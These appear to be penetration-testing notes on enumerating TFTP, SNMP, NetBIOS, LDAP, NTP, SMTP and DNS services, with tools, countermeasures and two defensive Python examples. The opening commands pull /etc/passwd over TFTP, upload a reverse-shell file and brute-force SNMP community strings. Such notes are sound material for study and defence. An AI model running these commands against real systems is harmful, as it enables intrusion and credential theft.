nmap -sU -p 69 --script tftp-enum.nse $ip
Interact with the TFTP protocol
#set up the connection
tftp 172.16.200.100
#get a file
tftp> get /etc/passwd
#upload a reverse shell
tftp> put shell.php
automated search for sensitive files (Metasploit)
msfconsole
use tftpbrute
set dictionary /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt

161 - SNMP
Checks
- Try the default community strings 'public' and 'private'
- Enumerate the version of the OS / users / processes
Commands
nmap
nmap -sU -p161 --script "snmp-*" $ip
scan a range of ip addresses for snmp strings
#only try "public" and "private"
onesixtyone -i targets.list
#try 100+ community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $ip
enumerate information with a known community string
# enumerate windows users
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25
# enumerate running processes
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1
Types of information enumerated by intruders: Network Resource and shares Users and Groups Routing tables Auditing and Service settings Machine names Applications and banners SNMP and DNS details Techniques for Enumeration Extracting user names using email ID's Extract information using the default password Brute Force Active Directory Extract user names using SNMP Extract user groups from Windows Extract information using DNS Zone transfer Services and Port to Enumerate TCP 53: DNS Zone transfer TCP 135: Microsoft RPC Endpoint Mapper TCP 137: NetBIOS Name Service TCP 139: NetBIOS session Service (SMB over NetBIOS) TCP 445: SMB over TCP (Direct Host) UDP 161: SNMP TCP/UDP 389: LDAP TCP/UDP 3368: Global Catalog Service TCP 25: Simple Mail Transfer Protocol (SMTP) NetBIOS Enumeration NetBIOS stands for Network Basic Input Output System. It Allows computer communication over a LAN and allows them to share files and printers. NetBIOS names are used to identify network devices over TCP/IP (Windows). It must be unique on a network, limited to 16 characters where 15 characters are used for the device name and the 16th character is reserved for identifying the type of service running or name record type. Attackers use the NetBIOS enumeration to obtain: List of computers that belong to a domain List of shares on the individual hosts on the network Policies and passwords Commands and tools used: Nbtstat: utility used to find protocol statistics, NetBIOS name table and name cache details Superscan: GUI tool used to enumerate windows machine Net view: command line tool to identify shared resources on a network SNMP Enumeration SNMP (Simple Network Management Protocol) is an application layer protocol which uses UDP protocol to maintain and manage routers, hubs and switches other network devices on an IP network. 
SNMP is a very common protocol found enabled on a variety of operating systems like Windows Server, Linux & UNIX servers as well as network devices like routers, switches etc. SNMP enumeration is used to enumerate user accounts, passwords, groups, system names, devices on a target system. It consists of three major components: Managed Device: A managed device is a device or a host (technically known as a node) which has the SNMP service enabled. These devices could be routers, switches, hubs, bridges, computers etc. Agent: An agent can be thought of as a piece of software that runs on a managed device. Its primary job is to convert the information into SNMP compatible format for the smooth management of the network using SNMP protocol. Network Management System (NMS): These are the software systems that are used for monitoring of the network devices. An agent running on every SNMP device will be providing access to a read and writable database. The database is referred to as the management information base (MIB) which is organized hierarchically and is a virtual database containing a formal description of all the network objects identified by a specific object identifier (OID) that can be managed using SNMP. It's a giant repository of values and settings. There is a manager involved in the process, and the manager will query the agent for various details. Community strings is a text string used to authenticate communications between the management stations and network devices on which SNMP agents are hosted. Community Strings travel in clear text over the network, hence are subject to network sniffing attacks. Community Strings are sent with every network packet exchanged between the node and management station. Two types of community strings: Read only: This mode permits querying the device and reading the information, but does not permit any kind of changes to the configuration. 
  The default community string for this mode is "public."
- Read Write: In this mode, changes to the device are permitted; hence if one connects with this community string, we can even modify the remote device's configuration. The default community string for this mode is "private."

When the community strings are left at their default settings, attackers take the opportunity to find loopholes through them.

A few tools:
- OpUtils Network Monitoring Toolset - http://www.manageengine.com
- SolarWinds (best SNMP enumeration tool) - www.solarwinds.com
- Command line tools: snmpwalk, snmp-check

Countermeasures:
- Remove or disable SNMP agents on hosts
- Block port 161 at all perimeter network access devices
- Restrict access to specific IP addresses
- Use SNMPv3 (more secure)
- Implement the Group Policy security option called "Additional restrictions for anonymous connections"
- Access to null session pipes, null session shares, and IPsec filtering should also be restricted

LDAP Enumeration

The Lightweight Directory Access Protocol is a protocol used to access directory listings within Active Directory or from other directory services. A directory is usually compiled in a hierarchical and logical format, rather like the levels of management and employees in a company. LDAP tends to be tied into the Domain Name System to allow integrated quick lookups and fast resolution of queries. LDAP generally runs on port 389 and, like other protocols, conforms to a distinct set of rules (RFCs). It is possible to query the LDAP service, sometimes anonymously, to obtain a great deal of information that gives the tester valid usernames, addresses and departmental details that could be utilised in a brute force or social engineering attack.

Tools:
- Jxplorer - http://www.jxplorer.org/
- LDAP Admin Tool - http://www.ldapsoft.com

Countermeasures:
- Use NTLM or Basic authentication to limit access to known users only.
- By default, LDAP traffic is transmitted unsecured; use SSL technology to encrypt the traffic.
- Select a username different from your email address and enable account lockout.

NTP Enumeration

The Network Time Protocol is a protocol for synchronizing time across your network; this is especially important when utilizing directory services. A number of time servers exist throughout the world that can be used to keep systems synced to each other. NTP utilizes UDP port 123. Through NTP enumeration you can gather information such as lists of hosts connected to the NTP server, IP addresses, system names, and OSs running on the client systems in a network. All this information can be enumerated by querying the NTP server.

SMTP Enumeration

The Simple Mail Transfer Protocol is used to send email messages, as opposed to POP3 or IMAP, which can be used to both send and receive messages. SMTP relies on Mail Exchange (MX) servers, located via the Domain Name System, to direct the mail; should an MX server not be found, SMTP falls back to trying an A record or, alternatively, SRV records. SMTP generally runs on port 25. SMTP enumeration allows us to determine valid users on the SMTP server. This is done with the help of built-in SMTP commands:
- VRFY - This command is used for validating users.
- EXPN - This command tells the actual delivery address of aliases and mailing lists.
- RCPT TO - It defines the recipients of the message.

Tool: NetScanTools Pro

Countermeasures:
- Configure the SMTP server to ignore email messages to unknown recipients.
- Don't include information like the mail relay systems being used, internal IP addresses or host information.
- Disable the open relay feature.

DNS Enumeration

DNS enumeration is the process of locating all the DNS servers and their corresponding records for an organization. DNS enumeration will yield usernames, computer names, and IP addresses of potential target systems.
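The VRFY, EXPN and RCPT TO behaviour from the SMTP section above, as an added example that is not part of the original notes: a minimal in-memory SMTP command handler in its leaky form beside a hardened form that answers identically for known and unknown recipients, so the dialogue no longer works as a user oracle. The domain, mailboxes, aliases and reply strings are constructed sample data.

```python
# Added example (not from the original notes): a minimal in-memory SMTP command handler
# in its leaky form beside a hardened one. Domain, mailboxes and aliases are constructed.
LOCAL_DOMAIN = "example.com"                     # constructed
KNOWN_USERS = {"alice", "bob"}                   # constructed sample mailboxes
ALIASES = {"postmaster": ["alice@example.com"]}  # constructed sample alias


def _parse(line: str):
    """Split 'VERB argument' into (verb, local part, domain); handles
    'VRFY bob', 'EXPN postmaster' and 'RCPT TO:<bob@example.com>'."""
    verb, _, arg = line.strip().partition(" ")
    verb = verb.upper()
    if verb == "RCPT":
        arg = arg.split(":", 1)[-1]          # drop the 'TO:' prefix
    local, _, domain = arg.strip("<> ").partition("@")
    return verb, local.lower(), domain.lower() or LOCAL_DOMAIN


def leaky_handler(line: str) -> str:
    """Typical default behaviour: the reply code reveals whether a mailbox exists."""
    verb, user, _ = _parse(line)
    if verb == "VRFY":
        return f"250 {user}@{LOCAL_DOMAIN}" if user in KNOWN_USERS else "550 5.1.1 User unknown"
    if verb == "EXPN":
        return "250 " + ", ".join(ALIASES[user]) if user in ALIASES else "550 5.1.1 List unknown"
    if verb == "RCPT":
        known = user in KNOWN_USERS or user in ALIASES
        return "250 2.1.5 OK" if known else "550 5.1.1 Recipient unknown"
    return "500 5.5.1 Command unrecognized"


def hardened_handler(line: str) -> str:
    """Hardened behaviour: no reply depends on whether the recipient exists."""
    verb, _, domain = _parse(line)
    if verb == "VRFY":
        return "252 2.5.2 Cannot VRFY user; try RCPT to attempt delivery"
    if verb == "EXPN":
        return "502 5.5.1 Command not implemented"
    if verb == "RCPT":
        # Accept every local-domain address; mail to unknown recipients is discarded
        # later, so the SMTP dialogue itself cannot be used to enumerate users.
        # Any other domain is refused, which also closes the open relay.
        return "250 2.1.5 OK" if domain == LOCAL_DOMAIN else "554 5.7.1 Relay access denied"
    return "500 5.5.1 Command unrecognized"


def is_user_oracle(handler, known: str, unknown: str) -> bool:
    """True if any of the three commands answers differently for a known
    and an unknown mailbox, i.e. the server can be used to enumerate users."""
    probes = ["VRFY {u}", "EXPN {u}", "RCPT TO:<{u}@" + LOCAL_DOMAIN + ">"]
    return any(handler(p.format(u=known)) != handler(p.format(u=unknown)) for p in probes)
```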
The list of DNS records provides an overview of the types of resource records (database records) stored in the zone files of the Domain Name System (DNS). The DNS implements a distributed, hierarchical, and redundant database for information associated with Internet domain names and addresses. A DNS zone transfer is used to replicate DNS data across a number of DNS servers or to back up DNS files. A user or server performs a specific zone transfer request to a name server. If the name server allows zone transfers by an anonymous user, all the DNS names and IP addresses hosted by the name server will be returned in human-readable ASCII text.

Tools:
- nslookup
- maltego
- dnsenum
- dnsrecon

Countermeasures:
- Disable zone transfers to untrusted hosts.
- Ensure that private hostnames are not referenced to IP addresses within the DNS zone files of publicly accessible DNS servers.
- Use premium registration services.
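Detection for the zone transfer countermeasure, as an added example that is not from the original notes: it scans query-log lines in the shape BIND writes for AXFR/IXFR requests that did not come from the zone's authorised secondaries. The log lines, the allowed networks and the zone name are constructed sample data.

```python
# Added example (not from the original notes): flag zone transfer requests from hosts
# that are not authorised secondaries. Log lines, networks and zone are constructed.
import re
from ipaddress import ip_address, ip_network

# Constructed policy: the only hosts allowed to pull a copy of the zone.
ALLOWED_SECONDARIES = [ip_network("192.0.2.0/29"), ip_network("2001:db8::/64")]

# Matches the query-log shape BIND writes:
#   client [@0x...] <ip>#<port> (<qname>): query: <name> IN <type> ...
QUERY_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9a-fA-F.:]+)#\d+ \([^)]*\): "
    r"query: (?P<name>\S+) IN (?P<qtype>[A-Z0-9]+)"
)

# Constructed sample log lines (one authorised AXFR, two unauthorised transfers, one normal query).
SAMPLE_LOG = """\
15-Mar-2024 10:22:31.101 client @0x7f3a4c0 192.0.2.2#40112 (example.com): query: example.com IN AXFR -E(0)T (192.0.2.1)
15-Mar-2024 10:22:45.220 client @0x7f3a4c0 203.0.113.9#53422 (example.com): query: example.com IN AXFR -E(0)T (192.0.2.1)
15-Mar-2024 10:22:46.004 client @0x7f3a4c0 203.0.113.9#53423 (www.example.com): query: www.example.com IN A -E(0)K (192.0.2.1)
15-Mar-2024 10:23:02.770 client @0x7f3a4c0 198.51.100.7#6001 (example.com): query: example.com IN IXFR -E(0)T (192.0.2.1)
15-Mar-2024 10:23:10.000 client @0x7f3a4c0 2001:db8::5#6002 (example.com): query: example.com IN AXFR -E(0)T (192.0.2.1)
"""


def is_authorised(ip: str) -> bool:
    """True if the client address lies inside one of the allowed secondary networks."""
    return any(ip_address(ip) in net for net in ALLOWED_SECONDARIES)


def find_unauthorised_transfers(log_text: str) -> list:
    """Return (client_ip, zone, AXFR|IXFR) for every transfer request from a host
    outside ALLOWED_SECONDARIES. Ordinary queries (A, MX, ...) are ignored."""
    hits = []
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m or m["qtype"] not in ("AXFR", "IXFR"):
            continue
        if not is_authorised(m["ip"]):
            hits.append((m["ip"], m["name"], m["qtype"]))
    return hits


if __name__ == "__main__":
    for ip, zone, qtype in find_unauthorised_transfers(SAMPLE_LOG):
        print(f"ALERT: {qtype} of {zone} requested by unauthorised client {ip}")
```

In production the same check belongs next to an `allow-transfer` restriction on the server; the log scan catches attempts that the restriction refuses as well as transfers that slipped through on a misconfigured zone.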